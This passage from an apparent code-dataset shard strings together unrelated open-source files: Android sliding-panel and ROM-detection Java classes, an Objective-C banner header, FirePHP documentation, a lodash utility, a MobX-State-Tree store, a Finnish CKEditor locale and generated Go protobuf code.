in case of fling, or 0.\n */\n boolean smoothSlideTo(float slideOffset, int velocity) {\n if (!isSlidingEnabled()) {\n // Nothing to do.\n return false;\n }\n\n int panelTop = computePanelTopPosition(slideOffset);\n if (mDragHelper.smoothSlideViewTo(mSlideableView, mSlideableView.getLeft(), panelTop)) {\n setAllChildrenVisible();\n ViewCompat.postInvalidateOnAnimation(this);\n return true;\n }\n return false;\n }\n\n @Override\n public void computeScroll() {\n if (mDragHelper != null && mDragHelper.continueSettling(true)) {\n if (!isSlidingEnabled()) {\n mDragHelper.abort();\n return;\n }\n\n ViewCompat.postInvalidateOnAnimation(this);\n }\n }\n\n @Override\n public void draw(Canvas c) {\n super.draw(c);\n\n if (!isSlidingEnabled()) {\n // No need to draw a shadow if we don't have one.\n return;\n }\n\n final int right = mSlideableView.getRight();\n final int top;\n final int bottom;\n if (mIsSlidingUp) {\n top = mSlideableView.getTop() - mShadowHeight;\n bottom = mSlideableView.getTop();\n } else {\n top = mSlideableView.getBottom();\n bottom = mSlideableView.getBottom() + mShadowHeight;\n }\n final int left = 
mSlideableView.getLeft();\n\n if (mShadowDrawable != null) {\n mShadowDrawable.setBounds(left, top, right, bottom);\n mShadowDrawable.draw(c);\n }\n }\n\n /**\n * Tests scrollability within child views of v given a delta of dx.\n *\n * @param v View to test for horizontal scrollability\n * @param checkV Whether the view v passed should itself be checked for scrollability (true),\n * or just its children (false).\n * @param dx Delta scrolled in pixels\n * @param x X coordinate of the active touch point\n * @param y Y coordinate of the active touch point\n * @return true if child views of v can be scrolled by delta of dx.\n */\n protected boolean canScroll(View v, boolean checkV, int dx, int x, int y) {\n if (v instanceof ViewGroup) {\n final ViewGroup group = (ViewGroup) v;\n final int scrollX = v.getScrollX();\n final int scrollY = v.getScrollY();\n final int count = group.getChildCount();\n // Count backwards - let topmost views consume scroll distance first.\n for (int i = count - 1; i >= 0; i--) {\n final View child = group.getChildAt(i);\n if (x + scrollX >= child.getLeft() && x + scrollX < child.getRight() &&\n y + scrollY >= child.getTop() && y + scrollY < child.getBottom() &&\n canScroll(child, true, dx, x + scrollX - child.getLeft(),\n y + scrollY - child.getTop())) {\n return true;\n }\n }\n }\n return checkV && ViewCompat.canScrollHorizontally(v, -dx);\n }\n\n @Override\n protected ViewGroup.LayoutParams generateDefaultLayoutParams() {\n return new LayoutParams();\n }\n\n @Override\n protected ViewGroup.LayoutParams generateLayoutParams(ViewGroup.LayoutParams p) {\n return p instanceof MarginLayoutParams\n ? new LayoutParams((MarginLayoutParams) p)\n : new LayoutParams(p);\n }\n\n @Override\n protected boolean checkLayoutParams(ViewGroup.LayoutParams p) {\n return p instanceof LayoutParams && super.checkLayoutParams(p);\n }\n\n @Override\n public ViewGroup.LayoutParams generateLayoutParams(AttributeSet attrs) {\n return new LayoutParams(getContext(), attrs);\n }\n\n @Override\n public Parcelable onSaveInstanceState() {\n Parcelable superState = super.onSaveInstanceState();\n\n SavedState ss = new SavedState(superState);\n ss.mSlideState = mSlideState;\n\n return ss;\n }\n\n @Override\n public void onRestoreInstanceState(Parcelable state) {\n SavedState ss = (SavedState) state;\n super.onRestoreInstanceState(ss.getSuperState());\n mSlideState = ss.mSlideState;\n }\n\n /**\n * Current state of the slideable view.\n */\n private enum SlideState {\n EXPANDED,\n COLLAPSED,\n ANCHORED,\n HIDDEN,\n DRAGGING\n }\n\n /**\n * Listener for monitoring events about sliding panes.\n */\n public interface PanelSlideListener {\n /**\n * Called when a sliding pane's position changes.\n *\n * @param panel The child view that was moved\n * @param slideOffset The new offset of this sliding pane within its range, from 0-1\n */\n void onPanelSlide(View panel, float slideOffset);\n\n /**\n * Called when a sliding panel becomes slid completely collapsed.\n *\n * @param panel The child view that was slid to an collapsed position\n */\n void onPanelCollapsed(View panel);\n\n /**\n * Called when a sliding panel becomes slid completely expanded.\n *\n * @param panel The child view that was slid to a expanded position\n */\n void onPanelExpanded(View panel);\n\n /**\n * Called when a sliding panel becomes anchored.\n *\n * @param panel The child view that was slid to a anchored position\n */\n void onPanelAnchored(View panel);\n\n /**\n * Called when a sliding panel becomes completely hidden.\n *\n * @param 
panel The child view that was slid to a hidden position\n */\n void onPanelHidden(View panel);\n }\n\n /**\n * No-op stubs for {@link PanelSlideListener}. If you only want to implement a subset\n * of the listener methods you can extend this instead of implement the full interface.\n */\n public static class SimplePanelSlideListener implements PanelSlideListener {\n @Override\n public void onPanelSlide(View panel, float slideOffset) {\n }\n\n @Override\n public void onPanelCollapsed(View panel) {\n }\n\n @Override\n public void onPanelExpanded(View panel) {\n }\n\n @Override\n public void onPanelAnchored(View panel) {\n }\n\n @Override\n public void onPanelHidden(View panel) {\n }\n }\n\n public static class LayoutParams extends MarginLayoutParams {\n private static final int[] ATTRS = new int[]{\n android.R.attr.layout_weight\n };\n\n public LayoutParams() {\n super(MATCH_PARENT, MATCH_PARENT);\n }\n\n public LayoutParams(int width, int height) {\n super(width, height);\n }\n\n public LayoutParams(ViewGroup.LayoutParams source) {\n super(source);\n }\n\n public LayoutParams(MarginLayoutParams source) {\n super(source);\n }\n\n public LayoutParams(LayoutParams source) {\n super(source);\n }\n\n public LayoutParams(Context c, AttributeSet attrs) {\n super(c, attrs);\n\n final TypedArray a = c.obtainStyledAttributes(attrs, ATTRS);\n a.recycle();\n }\n\n }\n\n static class SavedState extends BaseSavedState {\n public static final Creator CREATOR =\n new Creator() {\n @Override\n public SavedState createFromParcel(Parcel in) {\n return new SavedState(in);\n }\n\n @Override\n public SavedState[] newArray(int size) {\n return new SavedState[size];\n }\n };\n SlideState mSlideState;\n\n SavedState(Parcelable superState) {\n super(superState);\n }\n\n private SavedState(Parcel in) {\n super(in);\n try {\n mSlideState = Enum.valueOf(SlideState.class, in.readString());\n } catch (IllegalArgumentException e) {\n mSlideState = SlideState.COLLAPSED;\n }\n }\n\n @Override\n public void writeToParcel(Parcel out, int flags) {\n super.writeToParcel(out, flags);\n out.writeString(mSlideState.toString());\n }\n }\n\n private class DragHelperCallback extends ViewDragHelper.Callback {\n\n @Override\n public boolean tryCaptureView(View child, int pointerId) {\n if (mIsUnableToDrag) {\n return false;\n }\n\n return child == mSlideableView;\n }\n\n @Override\n public void onViewDragStateChanged(int state) {\n if (mDragHelper.getViewDragState() == ViewDragHelper.STATE_IDLE) {\n mSlideOffset = computeSlideOffset(mSlideableView.getTop());\n\n if (mSlideOffset == 1) {\n if (mSlideState != SlideState.EXPANDED) {\n updateObscuredViewVisibility();\n mSlideState = SlideState.EXPANDED;\n dispatchOnPanelExpanded(mSlideableView);\n }\n } else if (mSlideOffset == 0) {\n if (mSlideState != SlideState.COLLAPSED) {\n mSlideState = SlideState.COLLAPSED;\n dispatchOnPanelCollapsed(mSlideableView);\n }\n } else if (mSlideOffset < 0) {\n mSlideState = SlideState.HIDDEN;\n mSlideableView.setVisibility(View.GONE);\n dispatchOnPanelHidden(mSlideableView);\n } else if (mSlideState != SlideState.ANCHORED) {\n updateObscuredViewVisibility();\n mSlideState = SlideState.ANCHORED;\n dispatchOnPanelAnchored(mSlideableView);\n }\n }\n }\n\n @Override\n public void onViewCaptured(View capturedChild, int activePointerId) {\n setAllChildrenVisible();\n }\n\n @Override\n public void onViewPositionChanged(View changedView, int left, int top, int dx, int dy) {\n onPanelDragged(top);\n invalidate();\n }\n\n @Override\n public void 
onViewReleased(View releasedChild, float xvel, float yvel) {\n int target = 0;\n\n // direction is always positive if we are sliding in the expanded direction\n float direction = mIsSlidingUp ? -yvel : yvel;\n\n if (direction > 0) {\n // swipe up -> expand\n target = computePanelTopPosition(1.0f);\n } else if (direction < 0) {\n // swipe down -> collapse\n target = computePanelTopPosition(0.0f);\n } else if (mAnchorPoint != 1 && mSlideOffset >= (1.f + mAnchorPoint) / 2) {\n // zero velocity, and far enough from anchor point => expand to the top\n target = computePanelTopPosition(1.0f);\n } else if (mAnchorPoint == 1 && mSlideOffset >= 0.5f) {\n // zero velocity, and far enough from anchor point => expand to the top\n target = computePanelTopPosition(1.0f);\n } else if (mAnchorPoint != 1 && mSlideOffset >= mAnchorPoint) {\n target = computePanelTopPosition(mAnchorPoint);\n } else if (mAnchorPoint != 1 && mSlideOffset >= mAnchorPoint / 2) {\n target = computePanelTopPosition(mAnchorPoint);\n } else {\n // settle at the bottom\n target = computePanelTopPosition(0.0f);\n }\n\n mDragHelper.settleCapturedViewAt(releasedChild.getLeft(), target);\n invalidate();\n }\n\n @Override\n public int getViewVerticalDragRange(View child) {\n return mSlideRange;\n }\n\n @Override\n public int clampViewPositionVertical(View child, int top, int dy) {\n final int collapsedTop = computePanelTopPosition(0.f);\n final int expandedTop = computePanelTopPosition(1.0f);\n if (mIsSlidingUp) {\n return Math.min(Math.max(top, expandedTop), collapsedTop);\n } else {\n return Math.min(Math.max(top, collapsedTop), expandedTop);\n }\n }\n }\n}\n"} {"text": "//\n// YPCycleBanner.h\n// Wuxianda\n//\n// Created by MichaelPPP on 16/7/11.\n// Copyright © 2016年 michaelhuyp. All rights reserved.\n// 无线轮播图控件封装\n\n#import \n\n/** 轮播图将要开始拖动发出的通知 */\nUIKIT_EXTERN NSString* const kCycleBannerWillBeginDraggingNotification;\n/** 轮播图结束滑动发出的通知 */\nUIKIT_EXTERN NSString* const kCycleBannerDidEndDeceleratingNotification;\n\n@class YPCycleBanner;\ntypedef void(^YPCycleBannerBlock)(NSUInteger didselectIndex);\n\n\n@interface YPCycleBanner : UIView\n\n/** 图片url数组 */\n@property (nonatomic, copy) NSArray *models;\n\n/** 自动滚动间隔时间,默认5s */\n@property (nonatomic, assign) NSTimeInterval autoScrollTimeInterval;\n\n/**\n * 初始化方法\n *\n * @param frame 轮播图的frame\n * @param placeholderImage 占位图片\n * @param block block\n *\n * @return 轮播图实例\n */\n+ (instancetype)bannerViewWithFrame:(CGRect)frame placeholderImage:(UIImage *)placeholderImage block:(YPCycleBannerBlock)block;\n\n@end\n"} {"text": "\nWelcome to the new official home of the FirePHP documentation.\n\nNOTE: Some external links to FirePHP information are still included as not everything has been consolidated here yet.\n\n\nStatus\n======\n\nFirePHP 1.0 is currently in **public BETA** and will go STABLE very soon. 
Your [feedback](OpenSource#support) is important to get us there.\n\n\nFirePHP 1.0\n===========\n\nWelcome to FirePHP 1.0, the result of 3+ years of learning and experimenting on how to build a PHP development and debugging solution that\ncan save you some real time and frustration.\n\n**FirePHP is an advanced logging system that can display PHP variables in the browser as an application is navigated.** All communication\nis out of band to the application meaning that the logging data will not interfere with the normal functioning of the application.\n\nTraditionally, if you are not using an interactive debugger, you would typically debug your application with:\n\n CODE: {\"lang\":\"php\"}\n \n var_dump($variable);\n // or\n print_r($variable);\n\nThe problem with this approach is that:\n\n * The debug output is intermingled with your response data leading to broken page display and ajax responses\n * It is difficult to distinguish between many printed variables\n * It is impossible to determine where a specific debug message was triggered\n * The debug statements must be removed again when done\n * Larger object graphs (especially cyclical ones) cannot be printed or are too large too navigate intelligently\n\nPrevious attempts to solve these shortcomings have resulted in:\n\n * Interactive debuggers\n * PHP libraries that make printed variables more easy to navigate on the page\n * PHP libraries that log variables to files for later inspection\n\nEach of these solutions have their place but overall the shortcomings make for a less than ideal day-to-day development\nand debugging experience for the average developer in many/most cases.\n\nThe original goal of FirePHP (back in 2007) was to provide another approach by sending debug data in the response headers \n(no interference with response data) and display this nicely in the [Firebug](http://getfirebug.com/) [Console](http://getfirebug.com/commandline).\nThe approach seems to solve some real problems and is getting some good attention as FirePHP has become and continues to become more popular.\n\nThe FirePHP 1.0 system is the next incarnation of this approach and built from the groud up based on the\n[latest research and technology](http://christophdorn.com/Research/) to provide the foundation for a new kind of\ndevelopment and debugging approach that combines the best of:\n\n * **Error Reporting** - PHP native and used to detect syntax errors and API usage violations.\n * **Print Statements** - Deliberate *var_dump()* or *print()* statements by developer used to track execution flow and variables.\n * **Logging** - Deliberate logging to a file or other facility used to track events, execution flow and variables.\n * **Interactive Debugging** - PHP extension used by developer to directly interact with a running script to track live variable state.\n\nPLANNED: FirePHP integration with [Xdebug](http://xdebug.org/) is planned.\n\nWith FirePHP 1.0, variables are logged using the [Insight API](API/Insight):\n\n CODE: {\"lang\":\"php\", \"run\": \"http://reference.developercompanion.com/Tools/FirePHPCompanion/Run/Examples/TestRunner/index.php?x-insight=activate&action=run&snippet=insight-devcomp/snippets/HelloWorld\"}\n\n $console = FirePHP::to('page')->console();\n $console->label('The Label')->log('Hello World');\n $console->label('A Variable')->log($_GET);\n\nNOTE: The [traditional FirePHP API](API/FirePHP) is still supported.\n\nAnd displayed in the [Firebug](http://getfirebug.com/) [Console](http://getfirebug.com/commandline) or the 
[DeveloperCompanion](Clients#devcomp) Request Inspector respectively:\n\n![Firebug Console Image](resources/images/screenshots/HelloWorldFirebugConsole.png) ![DeveloperCompanion Request Inspector Image](resources/images/screenshots/HelloWorldDeveloperCompanion.png)\n\nFirePHP 1.0 is all about getting all types of meta and debug data from the server/application to the client in an intelligent way.\nNow that variable logging is pretty much complete further development will be adding support for displaying server log files, PHP configuration information,\napplication source files and much more in the client.\n\nWe welcome your interest in FirePHP and hope that it will save you time and frustration.\n\nNext Step: [Install](Install)\n"} {"text": "var baseFor = require('./_baseFor'),\n castFunction = require('./_castFunction'),\n keysIn = require('./keysIn');\n\n/**\n * Iterates over own and inherited enumerable string keyed properties of an\n * object and invokes `iteratee` for each property. The iteratee is invoked\n * with three arguments: (value, key, object). Iteratee functions may exit\n * iteration early by explicitly returning `false`.\n *\n * @static\n * @memberOf _\n * @since 0.3.0\n * @category Object\n * @param {Object} object The object to iterate over.\n * @param {Function} [iteratee=_.identity] The function invoked per iteration.\n * @returns {Object} Returns `object`.\n * @see _.forInRight\n * @example\n *\n * function Foo() {\n * this.a = 1;\n * this.b = 2;\n * }\n *\n * Foo.prototype.c = 3;\n *\n * _.forIn(new Foo, function(value, key) {\n * console.log(key);\n * });\n * // => Logs 'a', 'b', then 'c' (iteration order is not guaranteed).\n */\nfunction forIn(object, iteratee) {\n return object == null\n ? object\n : baseFor(object, castFunction(iteratee), keysIn);\n}\n\nmodule.exports = forIn;\n"} {"text": "import AbstractStore from './AbstractStore';\nimport preferences from '../../preferences';\n\nexport default class MSTChangesStore extends AbstractStore {\n mstLogEnabled = false;\n\n itemsDataByRootId = {};\n rootNamesById = {};\n\n constructor(bridge) {\n super();\n this.bridge = bridge;\n\n this.addDisposer(\n bridge.sub('frontend:append-mst-log-items', (newLogItem) => {\n const rootId = newLogItem.rootId;\n if (!this.itemsDataByRootId[rootId]) {\n if (!this.activeRootId) {\n this.activeRootId = rootId;\n this.emit('activeRootId');\n }\n this.itemsDataByRootId[rootId] = Object.create(null);\n this.itemsDataByRootId[rootId].logItemsIds = [];\n this.itemsDataByRootId[rootId].logItemsById = {};\n }\n const itemData = this.itemsDataByRootId[rootId];\n if (newLogItem.length > 500) {\n this.spliceLogItems(rootId, 0, itemData.logItemsIds.length - 480);\n }\n itemData.activeLogItemId = newLogItem.id;\n itemData.activeLogItemIndex = itemData.logItemsIds.length;\n itemData.logItemsIds.push(newLogItem.id);\n itemData.logItemsById[newLogItem.id] = newLogItem;\n\n this.emit('activeLogItemId');\n this.emit('mstLogItems');\n this.selectLogItemId(newLogItem.id);\n }),\n bridge.sub('mst-log-item-details', (logItem) => {\n const itemData = this.itemsDataByRootId[logItem.rootId];\n if (!itemData) return;\n itemData.logItemsById[logItem.id] = logItem;\n this.emit(logItem.id);\n }),\n bridge.sub('frontend:mst-roots', (roots) => {\n roots.forEach(({ id, name }) => {\n this.rootNamesById[id] = name;\n });\n this.emit('mstRootsUpdated');\n }),\n bridge.sub('frontend:remove-mst-root', (rootId) => {\n delete this.rootNamesById[rootId];\n delete this.itemsDataByRootId[rootId];\n 
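// removing a root also drops any log items buffered for it; the emit below lets subscribers refresh their root list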
this.emit('mstRootsUpdated');\n })\n );\n\n preferences.get('mstLogEnabled').then(({ mstLogEnabled = true }) => {\n if (mstLogEnabled) this.toggleMstLogging(true);\n });\n }\n\n toggleMstLogging(mstLogEnabled = !this.mstLogEnabled) {\n if (mstLogEnabled !== this.mstLogEnabled) {\n this.mstLogEnabled = mstLogEnabled;\n preferences.set({ mstLogEnabled });\n this.emit('mstLogEnabled');\n this.bridge.send('backend-mst:set-tracking-enabled', mstLogEnabled);\n }\n }\n\n commitAll() {\n Object.keys(this.itemsDataByRootId).forEach((rootId) => {\n this.spliceLogItems(rootId, 0, this.itemsDataByRootId[rootId].logItemsIds.length - 1);\n });\n this.emit('mstLogItems');\n }\n\n spliceLogItems(rootId, startIndex = 0, endIndex = Infinity) {\n const itemData = this.itemsDataByRootId[rootId];\n if (!itemData) return;\n const logItemsIds = itemData.logItemsIds;\n const removedItemsIds = logItemsIds.splice(startIndex, endIndex);\n removedItemsIds.forEach((id) => {\n delete itemData.logItemsById[id];\n });\n if (itemData.selectLogItemId && removedItemsIds.indexOf(itemData.selectedLogItemId) !== -1) {\n this.selectLogItemId(undefined);\n }\n this.bridge.send('backend-mst:forget-mst-items', { rootId, itemsIds: removedItemsIds });\n }\n\n activateRootId(rootId) {\n this.activeRootId = rootId;\n this.emit('activeRootId');\n }\n\n activateLogItemId(logItemId) {\n const rootId = this.activeRootId;\n const itemData = this.itemsDataByRootId[rootId];\n if (!itemData) return;\n this.bridge.send('backend-mst:activate-log-item-id', { rootId, logItemId });\n itemData.activeLogItemId = logItemId;\n itemData.activeLogItemIndex = itemData.logItemsIds.indexOf(logItemId);\n this.emit('activeLogItemId');\n }\n\n commitLogItemId(logItemId) {\n this.activateLogItemId(logItemId);\n const rootId = this.activeRootId;\n const itemData = this.itemsDataByRootId[rootId];\n if (!itemData) return;\n const idx = itemData.logItemsIds.indexOf(logItemId);\n if (idx !== -1) {\n this.spliceLogItems(rootId, 0, idx);\n }\n this.emit('mstLogItems');\n }\n\n cancelLogItemId(logItemId) {\n this.activateLogItemId(logItemId);\n const rootId = this.activeRootId;\n const itemData = this.itemsDataByRootId[rootId];\n if (!itemData) return;\n const idx = itemData.logItemsIds.indexOf(logItemId);\n if (idx !== -1 && idx !== 0) {\n this.activateLogItemId(itemData.logItemsIds[idx - 1]);\n this.spliceLogItems(rootId, idx);\n }\n this.emit('mstLogItems');\n }\n\n selectLogItemId(logItemId) {\n const rootId = this.activeRootId;\n const itemData = this.itemsDataByRootId[rootId];\n if (!itemData) return;\n itemData.selectedLogItemId = logItemId;\n this.emit('selectedLogItemId');\n this.getDetails(logItemId);\n }\n\n getDetails(logItemId) {\n this.bridge.send('get-mst-log-item-details', {\n rootId: this.activeRootId,\n logItemId,\n });\n }\n}\n"} {"text": "/*\nCopyright (c) 2003-2018, CKSource - Frederico Knabben. 
All rights reserved.\nFor licensing, see LICENSE.md or https://ckeditor.com/legal/ckeditor-oss-license\n*/\nCKEDITOR.plugins.setLang( 'table', 'fi', {\n\tborder: 'Rajan paksuus',\n\tcaption: 'Otsikko',\n\tcell: {\n\t\tmenu: 'Solu',\n\t\tinsertBefore: 'Lisää solu eteen',\n\t\tinsertAfter: 'Lisää solu perään',\n\t\tdeleteCell: 'Poista solut',\n\t\tmerge: 'Yhdistä solut',\n\t\tmergeRight: 'Yhdistä oikealla olevan kanssa',\n\t\tmergeDown: 'Yhdistä alla olevan kanssa',\n\t\tsplitHorizontal: 'Jaa solu vaakasuunnassa',\n\t\tsplitVertical: 'Jaa solu pystysuunnassa',\n\t\ttitle: 'Solun ominaisuudet',\n\t\tcellType: 'Solun tyyppi',\n\t\trowSpan: 'Rivin jatkuvuus',\n\t\tcolSpan: 'Solun jatkuvuus',\n\t\twordWrap: 'Rivitys',\n\t\thAlign: 'Horisontaali kohdistus',\n\t\tvAlign: 'Vertikaali kohdistus',\n\t\talignBaseline: 'Alas (teksti)',\n\t\tbgColor: 'Taustan väri',\n\t\tborderColor: 'Reunan väri',\n\t\tdata: 'Data',\n\t\theader: 'Ylätunniste',\n\t\tyes: 'Kyllä',\n\t\tno: 'Ei',\n\t\tinvalidWidth: 'Solun leveyden täytyy olla numero.',\n\t\tinvalidHeight: 'Solun korkeuden täytyy olla numero.',\n\t\tinvalidRowSpan: 'Rivin jatkuvuuden täytyy olla kokonaisluku.',\n\t\tinvalidColSpan: 'Solun jatkuvuuden täytyy olla kokonaisluku.',\n\t\tchooseColor: 'Valitse'\n\t},\n\tcellPad: 'Solujen sisennys',\n\tcellSpace: 'Solujen väli',\n\tcolumn: {\n\t\tmenu: 'Sarake',\n\t\tinsertBefore: 'Lisää sarake vasemmalle',\n\t\tinsertAfter: 'Lisää sarake oikealle',\n\t\tdeleteColumn: 'Poista sarakkeet'\n\t},\n\tcolumns: 'Sarakkeet',\n\tdeleteTable: 'Poista taulu',\n\theaders: 'Ylätunnisteet',\n\theadersBoth: 'Molemmat',\n\theadersColumn: 'Ensimmäinen sarake',\n\theadersNone: 'Ei',\n\theadersRow: 'Ensimmäinen rivi',\n\tinvalidBorder: 'Reunan koon täytyy olla numero.',\n\tinvalidCellPadding: 'Solujen sisennyksen täytyy olla numero.',\n\tinvalidCellSpacing: 'Solujen välin täytyy olla numero.',\n\tinvalidCols: 'Sarakkeiden määrän täytyy olla suurempi kuin 0.',\n\tinvalidHeight: 'Taulun korkeuden täytyy olla numero.',\n\tinvalidRows: 'Rivien määrän täytyy olla suurempi kuin 0.',\n\tinvalidWidth: 'Taulun leveyden täytyy olla numero.',\n\tmenu: 'Taulun ominaisuudet',\n\trow: {\n\t\tmenu: 'Rivi',\n\t\tinsertBefore: 'Lisää rivi yläpuolelle',\n\t\tinsertAfter: 'Lisää rivi alapuolelle',\n\t\tdeleteRow: 'Poista rivit'\n\t},\n\trows: 'Rivit',\n\tsummary: 'Yhteenveto',\n\ttitle: 'Taulun ominaisuudet',\n\ttoolbar: 'Taulu',\n\twidthPc: 'prosenttia',\n\twidthPx: 'pikseliä',\n\twidthUnit: 'leveysyksikkö'\n} );\n"} {"text": "package com.matisse.ucrop.immersion;\n\nimport android.os.Build;\nimport android.text.TextUtils;\n\nimport java.io.BufferedReader;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.util.regex.Pattern;\n\n/**\n * @author:luck\n * @data:2018/3/28 下午1:02\n * @描述: Rom版本管理\n */\n\npublic class CropRomUtils {\n public class AvailableRomType {\n public static final int MIUI = 1;\n public static final int FLYME = 2;\n public static final int ANDROID_NATIVE = 3;\n public static final int NA = 4;\n }\n\n\n private static Integer romType;\n\n public static int getLightStatausBarAvailableRomType() {\n if (romType != null) {\n return romType;\n }\n\n if (isMIUIV6OrAbove()) {\n romType = AvailableRomType.MIUI;\n return romType;\n }\n\n if (isFlymeV4OrAbove()) {\n romType = AvailableRomType.FLYME;\n return romType;\n }\n\n if (isAndroid5OrAbove()) {\n romType = AvailableRomType.ANDROID_NATIVE;\n return romType;\n }\n\n romType = AvailableRomType.NA;\n return romType;\n }\n\n //Flyme V4的displayId格式为 [Flyme OS 
4.x.x.xA]\n //Flyme V5的displayId格式为 [Flyme 5.x.x.x beta]\n private static boolean isFlymeV4OrAbove() {\n return (getFlymeVersion() >= 4);\n }\n\n\n //Flyme V4的displayId格式为 [Flyme OS 4.x.x.xA]\n //Flyme V5的displayId格式为 [Flyme 5.x.x.x beta]\n public static int getFlymeVersion() {\n String displayId = Build.DISPLAY;\n if (!TextUtils.isEmpty(displayId) && displayId.contains(\"Flyme\")) {\n displayId = displayId.replaceAll(\"Flyme\", \"\");\n displayId = displayId.replaceAll(\"OS\", \"\");\n displayId = displayId.replaceAll(\" \", \"\");\n\n\n String version = displayId.substring(0, 1);\n\n if (version != null) {\n return stringToInt(version);\n }\n }\n return 0;\n }\n\n //MIUI V6对应的versionCode是4\n //MIUI V7对应的versionCode是5\n private static boolean isMIUIV6OrAbove() {\n String miuiVersionCodeStr = getSystemProperty(\"ro.miui.ui.version.code\");\n if (!TextUtils.isEmpty(miuiVersionCodeStr)) {\n try {\n int miuiVersionCode = Integer.parseInt(miuiVersionCodeStr);\n if (miuiVersionCode >= 4) {\n return true;\n }\n } catch (Exception e) {\n }\n }\n return false;\n }\n\n\n public static int getMIUIVersionCode() {\n String miuiVersionCodeStr = getSystemProperty(\"ro.miui.ui.version.code\");\n int miuiVersionCode = 0;\n if (!TextUtils.isEmpty(miuiVersionCodeStr)) {\n try {\n miuiVersionCode = Integer.parseInt(miuiVersionCodeStr);\n return miuiVersionCode;\n } catch (Exception e) {\n }\n }\n return miuiVersionCode;\n }\n\n\n //Android Api 23以上\n private static boolean isAndroid5OrAbove() {\n if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {\n return true;\n }\n return false;\n }\n\n\n public static String getSystemProperty(String propName) {\n String line;\n BufferedReader input = null;\n try {\n Process p = Runtime.getRuntime().exec(\"getprop \" + propName);\n input = new BufferedReader(new InputStreamReader(p.getInputStream()), 1024);\n line = input.readLine();\n input.close();\n } catch (IOException ex) {\n return null;\n } finally {\n if (input != null) {\n try {\n input.close();\n } catch (IOException e) {\n }\n }\n }\n return line;\n }\n\n public static int stringToInt(String str) {\n Pattern pattern = Pattern.compile(\"^[-\\\\+]?[\\\\d]+$\");\n if (pattern.matcher(str).matches()) {\n return Integer.valueOf(str);\n }\n return 0;\n }\n}\n"} {"text": "// Code generated by protoc-gen-go. 
DO NOT EDIT.\n// source: google/protobuf/any.proto\n\npackage any // import \"github.com/golang/protobuf/ptypes/any\"\n\nimport proto \"github.com/golang/protobuf/proto\"\nimport fmt \"fmt\"\nimport math \"math\"\n\n// Reference imports to suppress errors if they are not otherwise used.\nvar _ = proto.Marshal\nvar _ = fmt.Errorf\nvar _ = math.Inf\n\n// This is a compile-time assertion to ensure that this generated file\n// is compatible with the proto package it is being compiled against.\n// A compilation error at this line likely means your copy of the\n// proto package needs to be updated.\nconst _ = proto.ProtoPackageIsVersion2 // please upgrade the proto package\n\n// `Any` contains an arbitrary serialized protocol buffer message along with a\n// URL that describes the type of the serialized message.\n//\n// Protobuf library provides support to pack/unpack Any values in the form\n// of utility functions or additional generated methods of the Any type.\n//\n// Example 1: Pack and unpack a message in C++.\n//\n// Foo foo = ...;\n// Any any;\n// any.PackFrom(foo);\n// ...\n// if (any.UnpackTo(&foo)) {\n// ...\n// }\n//\n// Example 2: Pack and unpack a message in Java.\n//\n// Foo foo = ...;\n// Any any = Any.pack(foo);\n// ...\n// if (any.is(Foo.class)) {\n// foo = any.unpack(Foo.class);\n// }\n//\n// Example 3: Pack and unpack a message in Python.\n//\n// foo = Foo(...)\n// any = Any()\n// any.Pack(foo)\n// ...\n// if any.Is(Foo.DESCRIPTOR):\n// any.Unpack(foo)\n// ...\n//\n// Example 4: Pack and unpack a message in Go\n//\n// foo := &pb.Foo{...}\n// any, err := ptypes.MarshalAny(foo)\n// ...\n// foo := &pb.Foo{}\n// if err := ptypes.UnmarshalAny(any, foo); err != nil {\n// ...\n// }\n//\n// The pack methods provided by protobuf library will by default use\n// 'type.googleapis.com/full.type.name' as the type URL and the unpack\n// methods only use the fully qualified type name after the last '/'\n// in the type URL, for example \"foo.bar.com/x/y.z\" will yield type\n// name \"y.z\".\n//\n//\n// JSON\n// ====\n// The JSON representation of an `Any` value uses the regular\n// representation of the deserialized, embedded message, with an\n// additional field `@type` which contains the type URL. Example:\n//\n// package google.profile;\n// message Person {\n// string first_name = 1;\n// string last_name = 2;\n// }\n//\n// {\n// \"@type\": \"type.googleapis.com/google.profile.Person\",\n// \"firstName\": ,\n// \"lastName\": \n// }\n//\n// If the embedded message type is well-known and has a custom JSON\n// representation, that representation will be embedded adding a field\n// `value` which holds the custom JSON in addition to the `@type`\n// field. 
Example (for message [google.protobuf.Duration][]):\n//\n// {\n// \"@type\": \"type.googleapis.com/google.protobuf.Duration\",\n// \"value\": \"1.212s\"\n// }\n//\ntype Any struct {\n\t// A URL/resource name whose content describes the type of the\n\t// serialized protocol buffer message.\n\t//\n\t// For URLs which use the scheme `http`, `https`, or no scheme, the\n\t// following restrictions and interpretations apply:\n\t//\n\t// * If no scheme is provided, `https` is assumed.\n\t// * The last segment of the URL's path must represent the fully\n\t// qualified name of the type (as in `path/google.protobuf.Duration`).\n\t// The name should be in a canonical form (e.g., leading \".\" is\n\t// not accepted).\n\t// * An HTTP GET on the URL must yield a [google.protobuf.Type][]\n\t// value in binary format, or produce an error.\n\t// * Applications are allowed to cache lookup results based on the\n\t// URL, or have them precompiled into a binary to avoid any\n\t// lookup. Therefore, binary compatibility needs to be preserved\n\t// on changes to types. (Use versioned type names to manage\n\t// breaking changes.)\n\t//\n\t// Schemes other than `http`, `https` (or the empty scheme) might be\n\t// used with implementation specific semantics.\n\t//\n\tTypeUrl string `protobuf:\"bytes,1,opt,name=type_url,json=typeUrl,proto3\" json:\"type_url,omitempty\"`\n\t// Must be a valid serialized protocol buffer of the above specified type.\n\tValue []byte `protobuf:\"bytes,2,opt,name=value,proto3\" json:\"value,omitempty\"`\n\tXXX_NoUnkeyedLiteral struct{} `json:\"-\"`\n\tXXX_unrecognized []byte `json:\"-\"`\n\tXXX_sizecache int32 `json:\"-\"`\n}\n\nfunc (m *Any) Reset() { *m = Any{} }\nfunc (m *Any) String() string { return proto.CompactTextString(m) }\nfunc (*Any) ProtoMessage() {}\nfunc (*Any) Descriptor() ([]byte, []int) {\n\treturn fileDescriptor_any_744b9ca530f228db, []int{0}\n}\nfunc (*Any) XXX_WellKnownType() string { return \"Any\" }\nfunc (m *Any) XXX_Unmarshal(b []byte) error {\n\treturn xxx_messageInfo_Any.Unmarshal(m, b)\n}\nfunc (m *Any) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {\n\treturn xxx_messageInfo_Any.Marshal(b, m, deterministic)\n}\nfunc (dst *Any) XXX_Merge(src proto.Message) {\n\txxx_messageInfo_Any.Merge(dst, src)\n}\nfunc (m *Any) XXX_Size() int 